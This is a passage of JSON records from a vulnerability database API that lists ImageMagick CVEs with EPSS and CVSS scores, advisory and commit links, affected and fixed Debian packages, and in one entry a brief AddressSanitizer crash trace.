"scoring_elements": "0.06578", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.06663", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.06671", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.06558", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.06594", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.06628", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.06724", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.06726", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.06568", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.06577", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.06647", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.06656", "published_at": "2026-04-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25988" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25988", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25988" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/4354fc1d554ec2e6314aed13536efa7bde9593d2", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/4354fc1d554ec2e6314aed13536efa7bde9593d2" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-782x-jh29-9mf7", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:08:10Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-782x-jh29-9mf7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25988", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25988" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442101", "reference_id": "2442101", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442101" }, { "reference_url": "https://github.com/advisories/GHSA-782x-jh29-9mf7", "reference_id": "GHSA-782x-jh29-9mf7", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-782x-jh29-9mf7" }, { "reference_url": "https://usn.ubuntu.com/8127-1/", "reference_id": "USN-8127-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8127-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-25988", "GHSA-782x-jh29-9mf7" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p5aw-n691-nkff" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/22389?format=api", "vulnerability_id": "VCID-pcme-bwan-3bcf", "summary": "ImageMagick has NULL Pointer Dereference in ClonePixelCacheRepository via crafted image\nA NULL pointer dereference in ClonePixelCacheRepository allows a remote attacker to crash any application linked against ImageMagick by supplying a crafted image file, resulting in Denial of Service.\n\n```\nAddressSanitizer:DEADLYSIGNAL\n=================================================================\n==3704942==ERROR: AddressSanitizer: UNKNOWN SIGNAL on unknown address 0x000000000000 (pc 0x7f9d141239e0 bp 0x7ffd4c5711e0 sp 0x7ffd4c571148 T0)\n #0 0x7f9d141239e0 (/lib/x86_64-linux-gnu/libc.so.6+0xc49e0)\n #1 0x558a25e4f08d in ClonePixelCacheRepository._omp_fn.0 MagickCore/cache.c:784\n #2 0x7f9d14c06a15 in GOMP_parallel (/lib/x86_64-linux-gnu/libgomp.so.1+0x14a15)\n #3 0x558a25e43151 in ClonePixelCacheRepository MagickCore/cache.c:753\n #4 0x558a25e49a96 in OpenPixelCache MagickCore/cache.c:3849\n #5 0x558a25e45117 in GetImagePixelCache MagickCore/cache.c:1829\n #6 0x558a25e4dde3 in SyncImagePixelCache MagickCore/cache.c:5647\n #7 0x558a256ba57d in SetImageExtent MagickCore/image.c:2713\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25798.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25798.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25798", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00063", "scoring_system": "epss", "scoring_elements": "0.19314", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00063", "scoring_system": "epss", "scoring_elements": "0.19416", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00063", "scoring_system": "epss", "scoring_elements": "0.19401", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00063", "scoring_system": "epss", "scoring_elements": "0.19393", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00063", "scoring_system": "epss", "scoring_elements": "0.19433", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00063", "scoring_system": "epss", "scoring_elements": "0.19491", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00063", "scoring_system": "epss", "scoring_elements": "0.19538", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00063", "scoring_system": "epss", "scoring_elements": "0.19535", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00063", "scoring_system": "epss", "scoring_elements": "0.19483", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00063", "scoring_system": "epss", "scoring_elements": "0.19405", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00063", "scoring_system": "epss", "scoring_elements": "0.19683", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00152", "scoring_system": "epss", "scoring_elements": "0.35968", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25798" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25798", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25798" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/e046417675d5c26e5f48816851a406c121c77469", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/e046417675d5c26e5f48816851a406c121c77469" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/issues/8567", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/issues/8567" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-p863-5fgm-rgq4", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T15:20:58Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-p863-5fgm-rgq4" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25798", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25798" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442119", "reference_id": "2442119", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442119" }, { "reference_url": "https://github.com/advisories/GHSA-p863-5fgm-rgq4", "reference_id": "GHSA-p863-5fgm-rgq4", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-p863-5fgm-rgq4" }, { "reference_url": "https://usn.ubuntu.com/8127-1/", "reference_id": "USN-8127-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8127-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-25798", "GHSA-p863-5fgm-rgq4" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pcme-bwan-3bcf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/351740?format=api", "vulnerability_id": "VCID-qjxn-gm96-7ygc", "summary": "ImageMagick: Magick.NET: ImageMagick: Denial of Service via integer overflow in despeckle operation", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-34238.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-34238.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34238", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01529", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01596", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03675", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03681", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34238" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34238", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34238" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T13:46:28Z/" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/bcd8519c70ecd9ebbc180920f2cf97b267d1f440", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T13:46:28Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/bcd8519c70ecd9ebbc180920f2cf97b267d1f440" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T13:46:28Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458048", "reference_id": "2458048", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458048" }, { "reference_url": "https://github.com/advisories/GHSA-26qp-ffjh-2x4v", "reference_id": "GHSA-26qp-ffjh-2x4v", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-26qp-ffjh-2x4v" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-26qp-ffjh-2x4v", "reference_id": "GHSA-26qp-ffjh-2x4v", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T13:46:28Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-26qp-ffjh-2x4v" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026115?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" }, { "url": "http://public2.vulnerablecode.io/api/packages/1054646?format=api", "purl": "pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068084?format=api", "purl": "pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1" } ], "aliases": [ "CVE-2026-34238", "GHSA-26qp-ffjh-2x4v" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qjxn-gm96-7ygc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/24199?format=api", "vulnerability_id": "VCID-r3vw-ncns-cqgb", "summary": "ImageMagick is vulnerable to heap buffer over-write on 32-bit systems in SFW decoder\nAn overflow on 32-bit systems can cause a crash in the SFW decoder when processing extremely large images.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-31853.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-31853.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-31853", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02624", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02649", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02629", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02625", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02621", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02606", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03326", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03252", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.0323", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03205", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03215", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03335", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-31853" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-31853", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-31853" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-56jp-jfqg-f8f4", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-11T17:41:49Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-56jp-jfqg-f8f4" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31853", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31853" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446690", "reference_id": "2446690", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446690" }, { "reference_url": "https://github.com/advisories/GHSA-56jp-jfqg-f8f4", "reference_id": "GHSA-56jp-jfqg-f8f4", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", 